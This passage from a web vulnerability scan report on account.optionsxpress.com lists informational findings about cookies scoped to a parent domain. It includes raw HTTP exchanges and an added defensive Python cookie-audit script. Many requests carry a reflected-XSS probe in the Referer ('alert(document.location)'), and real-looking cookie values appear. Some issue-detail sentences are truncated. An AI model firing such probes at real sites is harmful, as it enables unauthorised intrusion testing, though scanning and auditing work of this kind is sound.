The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The Firm=OX cookie set by the same response carries no Domain attribute and is therefore host-only, so it is not affected. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...
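The two Set-Cookie headers in this 404 response make a useful contrast: Firm=OX has no Domain attribute, so browsers treat it as host-only and send it back only to account.optionsxpress.com, while TLTHID carries Domain=.optionsxpress.com and is sent to, and can be overwritten by, every host under optionsxpress.com. The Python below is an added example, not part of the XSS.CX report or of the scanner that produced it. It parses the Set-Cookie headers out of a raw HTTP response, applies the RFC 6265 domain-match rule, and flags cookies scoped to a parent of the issuing host the way the entries in this section do; it also notes the missing Secure and HttpOnly attributes that are visible on every Set-Cookie line in these HTTPS responses. The sample response is constructed from the status line and headers shown above (body omitted), and the function names are the example's own.

```python
"""Added example: flag parent-scoped cookies in raw HTTP responses.

Not part of the original report. SAMPLE_RESPONSE is constructed from the
status line and Set-Cookie headers of the 9.31 entry; the body is omitted.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample (headers copied from the report entry above, body dropped).
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/\r\n"
    "Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com\r\n"
    "Date: Thu, 08 Sep 2011 19:25:29 GMT\r\n"
    "\r\n"
)


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None   # None means a host-only cookie
    path: str = "/"
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse one Set-Cookie header value; attribute names are case-insensitive."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            # RFC 6265 5.2.3: a leading dot is ignored, so ".optionsxpress.com"
            # and "optionsxpress.com" set the same scope.
            cookie.domain = val.lower().lstrip(".")
        elif key == "path":
            cookie.path = val or "/"
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
    return cookie


def set_cookie_values(raw_response: str) -> List[str]:
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        hname, _, hvalue = line.partition(":")   # only the first colon separates name/value
        if hname.strip().lower() == "set-cookie":
            values.append(hvalue.strip())
    return values


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 5.1.3: host domain-matches domain if equal or a subdomain of it."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def audit_cookies(raw_response: str, issuing_host: str,
                  over_https: bool = True) -> Dict[str, List[str]]:
    """Map each cookie name to the findings a scanner would report for it."""
    findings: Dict[str, List[str]] = {}
    for hv in set_cookie_values(raw_response):
        c = parse_set_cookie(hv)
        notes = findings.setdefault(c.name, [])
        if c.domain is not None:
            if not domain_matches(issuing_host, c.domain):
                # A browser rejects such a cookie outright (RFC 6265 5.3 step 6).
                notes.append("domain-mismatch")
            elif c.domain != issuing_host.lower():
                # Readable and overwritable from every host under c.domain.
                notes.append("parent-scoped:" + c.domain)
        if over_https and not c.secure:
            notes.append("missing-secure")
        if not c.httponly:
            notes.append("missing-httponly")
    return findings


if __name__ == "__main__":
    for name, notes in audit_cookies(SAMPLE_RESPONSE, "account.optionsxpress.com").items():
        print(name, notes)
```

Run against the constructed response, TLTHID is reported as parent-scoped to optionsxpress.com and Firm is not, which is exactly the split the Issue detail above describes. Note that the scanner's "does not appear to contain a session token" verdict is a heuristic on the cookie value; whether a parent-scoped cookie matters depends on what the other hosts under that parent can do with it, so the review the report asks for is still needed.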

9.32. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

GIF89a.............!.......,...........D..;

9.33. https://account.optionsxpress.com/inc/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.optionsxpress.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

9.34. https://account.optionsxpress.com/inc/interface.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

9.35. https://account.optionsxpress.com/inc/js/plugins/accordion.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

9.36. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: TLTHID and TLTSID (both Domain=.optionsxpress.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

9.37. https://account.optionsxpress.com/inc/newaccount/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

9.38. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.39. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
*
* Copyright (c) 2009 John Resig, http://jquery.com/
*
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this softw
...[SNIP]...

9.40. https://account.optionsxpress.com/inc/newaccount/jquery.autotab.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.autotab.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.autotab.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 3628
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "602a83c682f0ca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=BFE98F2847714286306A699E393BF382; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*
* jQuery AutoTab plugin
* http://dev.lousyllama.com/auto-tab
*
* Copyright (c) 2007 Matthew Miller
* Licensed under the MIT License:
* http://www.opensource.org/licenses/mit-license.
...[SNIP]...

9.41. https://account.optionsxpress.com/inc/newaccount/jquery.scrollTo-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery.scrollTo-min.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery.scrollTo-min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 2262
Content-Type: application/x-javascript
Last-Modified: Fri, 30 Apr 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "f043f15fa7e8ca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=CAA6523C4506CCBF77FDA49C4F49A484; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

9.42. https://account.optionsxpress.com/inc/newaccount/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/styles.css

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/styles.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 13213
Content-Type: text/css
Last-Modified: Tue, 23 Nov 2010 16:59:49 GMT
Accept-Ranges: bytes
ETag: "f74a6d62f8bcb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=392D4AC8455569B192DA4CA32E2368FD; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*    
   Purpose:    Styles for the new account process. Shared for all sites.
   Created by: Shawn Roser
   Date:        2/9/2005
*/

/* Style Redefinitions */

/*body { background: #EBEBEB; text-align: ce
...[SNIP]...

9.43. https://account.optionsxpress.com/inc/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/s_code.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/s_code.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 40455
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Jun 2011 15:21:04 GMT
Accept-Ranges: bytes
ETag: "0b0f8832625cc1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=6A9CD6494BF18A25AD37E2AC6CC8ACAC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* global JS methods */
Array.prototype.indexOf = function (obj) {
   for (var i = 0; i < this.length; i++) {
       if (this[i] == obj) return i;
   }
   return -1;
}
Array.prototype.has = function (obj)
...[SNIP]...

9.44. http://rcv-srv20.inplay.tubemogul.com/StreamReceiver/services

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcv-srv20.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: rcv-srv20.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
Content-Length: 1000
Origin: http://ibkb.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamm
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
